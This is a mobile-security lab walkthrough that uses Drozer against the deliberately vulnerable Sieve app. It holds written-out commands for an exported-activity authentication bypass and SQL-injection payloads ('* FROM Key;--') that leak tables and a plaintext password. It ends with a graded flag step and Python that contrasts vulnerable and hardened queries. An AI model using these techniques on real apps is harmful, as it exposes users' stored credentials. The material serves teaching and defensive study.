Drozer allows you to audit IPC endpoints.
sudo apt update
sudo apt install curl -y
wget https://github.com/mwrlabs/drozer/releases/download/2.4.4/drozer-2.4.4-py2-none-any.whl
curl https://raw.githubusercontent.com/pypa/get-pip/3843bff3a0a61da5b63ea0b7d34794c5c51a2f11/2.7/get-pip.py -o get-pip.py
python get-pip.py
python -m pip install drozer-2.4.4-py2-none-any.whl
pip install twisted
Drozer is "successfully installed",
as shown below.
On Debian, in a Terminal, execute these commands:
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/drozer-agent-2.3.4.apk
The file downloads,
as shown below.
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the
"List of devices attached",
as shown below.
adb install drozer-agent-2.3.4.apk
You see a "Success" message,
as shown below.
On Debian, in a Terminal, execute this command:
adb forward tcp:31415 tcp:31415
The command completes without errors,
as shown below.
Launch drozer, as shown below.
In the "drozer" screen, at the lower right, click OFF. Now the "Embedded Server" is "ON", as shown below.
drozer console connect
help
Drozer starts,
as shown below.
On Debian, at the
dz>
prompt, execute
these commands:
help shell
! whoami
As you can see, Drozer allows you to
run shellcode on your device, with
the permissions of the Drozer agent,
which is not root, but a
numbered user account. On my device,
the account was u0_s102,
as shown below.
On Debian, at the
dz>
prompt, execute
this command:
list
A long list of drozer modules appears,
as shown below. Drozer is a huge
pentesting framework, like Metasploit.
On Debian, at the
dz>
prompt, execute
this command:
exit
On Debian, in the Terminal, execute these commands.
wget https://github.com/mwrlabs/drozer/releases/download/2.3.4/sieve.apk
adb install sieve.apk
The install fails with "NO_MATCHING_ABIS",
as shown below.
The problem is that Sieve is an ARM app, but Genymotion is an x86 emulator.
Troubleshooting
If that download link fails, use this alternate command:
wget https://samsclass.info/128/proj/sieve.apk
https://github.com/m9rco/Genymotion_ARM_Translation
You can download the ZIP file from that page and unzip it, or use "git", as shown below.
On a Mac, execute these commands:
brew install git
git clone https://github.com/m9rco/Genymotion_ARM_Translation.git
Open the "Genymotion_ARM_Translation/package" folder,
as shown below.
Drag the appropriate library file onto your Android device and drop it there.
A warning message pops up, as shown below. Click OK.
A message says the file was flashed successfully, as shown below. Click OK.
Turn off your Android device and restart it.
On Debian, in a Terminal, execute these commands, replacing the IP address with the IP address of your Genymotion Android device:
adb connect 172.16.123.154
adb devices -l
You should see your Genymotion device in the
"List of devices attached",
as shown below.
adb install sieve.apk
You see a "Success" message,
as shown below.
Launch Sieve, as shown below.
A "Welcome!" screen appears, as shown below.
Enter a password of Password12345678 in both fields and click Submit.
On the "Enter PIN" page, enter a PIN of 4567 in both fields and click Submit, as shown below.
In the next page, enter the password Password12345678 and click "Sign in", as shown below.
In the "Your Passwords" page, at the top right, click the + icon.
Enter some test data, as shown below, and click Save.
Don't put any real passwords into this app, of course, because they will be revealed later in the project.
Launch drozer, as shown below.
The "Embedded Server" should be "ON", as shown below.
On Debian, in a Terminal, and then at the
dz>
prompt, execute
these commands:
adb forward tcp:31415 tcp:31415
drozer console connect
run app.package.list -f sieve
Drozer finds the path to the
sieve app, which is
com.mwr.example.sieve
as shown below.
To see basic package information,
on Debian, at the
dz>
prompt, execute
this command:
run app.package.info -a com.mwr.example.sieve
This shows where the app stores
data, what permissions it has, and more
information,
as shown below.
On Debian, at the
dz>
prompt, execute
this command:
run app.package.attacksurface com.mwr.example.sieve
Drozer finds several items "exported"
as shown below. These items accept
input from other apps, and are possible
avenues of exploitation.
On Debian, at the
dz>
prompt, execute
this command:
run app.activity.info -a com.mwr.example.sieve
Drozer lists the app's activities and marks several as "exported",
as shown below. These activities can be started
by other apps, and are possible
avenues of exploitation.
The "MainLoginActivity" makes sense--the app needs to take input from the keyboard for that.
But what are "FileSelectActivity" and "PWList"? They are both exported, and can be run without any permissions, as indicated by the "Permission: null" message.
Position the Android device so that it remains visible while you execute the Drozer command below.
On Debian, at the
dz>
prompt, execute
this command:
run app.activity.start --component com.mwr.example.sieve com.mwr.example.sieve.PWList
The command runs without errors,
as shown below.
On your Android device, the "Your Passwords" page opens, as shown below.
This is an authentication bypass exploit--the Drozer agent did not need your password or PIN to open this screen.
But at this point, we only see usernames, not passwords.
On Debian, at the
dz>
prompt, execute
this command:
run app.provider.info -a com.mwr.example.sieve
Drozer finds two exported content
providers: DBContentProvider
and FileBackupProvider,
as shown below. They don't require
any permissions to interact with them,
except for the /Keys
path in the DBContentProvider.
On Debian, at the
dz>
prompt, execute
this command:
run scanner.provider.finduris -a com.mwr.example.sieve
Drozer tries several guesses, and finds
three "Accessible content URIs",
highlighted in the image below.
We know the /Keys provider requires
permissions, but evidently not
/Passwords. To run the
/Passwords provider,
on Debian, at the
dz>
prompt, execute
this command:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/
You see your username and encoded password,
highlighted in the image below.
The password was unprintable binary data, so Drozer encoded it with Base64. We don't have the plaintext password yet.
On Debian, at the
dz>
prompt, execute
these commands:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "'"
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --selection "'"
The reply shows "SQLITE_ERROR" messages,
including the source code for the query,
highlighted in the image below.
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM SQLITE_MASTER WHERE type='table';--"
The reply reveals three table names,
including Key,
highlighted in the image below.
M 501: Recording Your Success (20 pts)
Find the text covered by a green box in the image above. That's the flag.
Execute this command:
run app.provider.query content://com.mwr.example.sieve.DBContentProvider/Passwords/ --projection "* FROM Key;--"
The reply reveals
your plaintext password,
as shown below.
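The --projection and --selection injections above work because the provider splices those strings straight into its SQL. As an added example (not code from this page or from Sieve's source), here is a Python/sqlite3 re-creation of that pattern beside a hardened version that allow-lists column names and binds the filter value; the schema, column names and sample rows are assumptions for the demo.

```python
import sqlite3

# Constructed stand-in for the Sieve DB; table/column names are assumptions, not the real schema.
SCHEMA = """
CREATE TABLE Passwords (_id INTEGER PRIMARY KEY, service TEXT, username TEXT, password BLOB);
CREATE TABLE Key (Password TEXT, pin TEXT);
INSERT INTO Passwords (service, username, password) VALUES ('mail', 'alice', X'DEADBEEF');
INSERT INTO Key VALUES ('Password12345678', '4567');
"""
def make_db():
    conn = sqlite3.connect(":memory:")
    conn.executescript(SCHEMA)
    return conn
def vulnerable_query(conn, projection="*", selection=None):
    """Splices the caller's projection/selection into the SQL text: this is
    the pattern that makes drozer's --projection and --selection inject."""
    sql = "SELECT " + projection + " FROM Passwords"
    if selection:
        sql += " WHERE " + selection
    return conn.execute(sql).fetchall()

ALLOWED_COLUMNS = {"_id", "service", "username", "password"}

def hardened_query(conn, projection=None, username=None):
    """Allow-lists column names and binds the filter value as a parameter
    (on Android: SQLiteQueryBuilder.setStrict(true) plus a projection map)."""
    cols = list(projection) if projection else sorted(ALLOWED_COLUMNS)
    bad = [c for c in cols if c not in ALLOWED_COLUMNS]
    if bad:
        raise ValueError("rejected projection columns: %r" % bad)
    sql, args = "SELECT " + ", ".join(cols) + " FROM Passwords", ()
    if username is not None:
        sql, args = sql + " WHERE username = ?", (username,)
    return conn.execute(sql, args).fetchall()

def demo():
    conn, out = make_db(), {}
    try:  # --projection "'" : the syntax error that leaks the query text
        vulnerable_query(conn, projection="'")
        out["quote_error"] = None
    except sqlite3.OperationalError as e:
        out["quote_error"] = str(e)
    out["tables"] = sorted(r[1] for r in vulnerable_query(  # table names leak
        conn, projection="* FROM sqlite_master WHERE type='table'--"))
    out["key_rows"] = vulnerable_query(conn, projection="* FROM Key--")
    try:
        hardened_query(conn, projection=["* FROM Key--"])
        out["hardened_rejects"] = False
    except ValueError:
        out["hardened_rejects"] = True
    out["hardened_ok"] = hardened_query(conn, ["username"], username="alice")
    return out
```

Running demo() shows the same three stages as the drozer session (syntax error, table names, Key rows) against the vulnerable function, while the hardened function rejects the injected projection and only returns allow-listed columns.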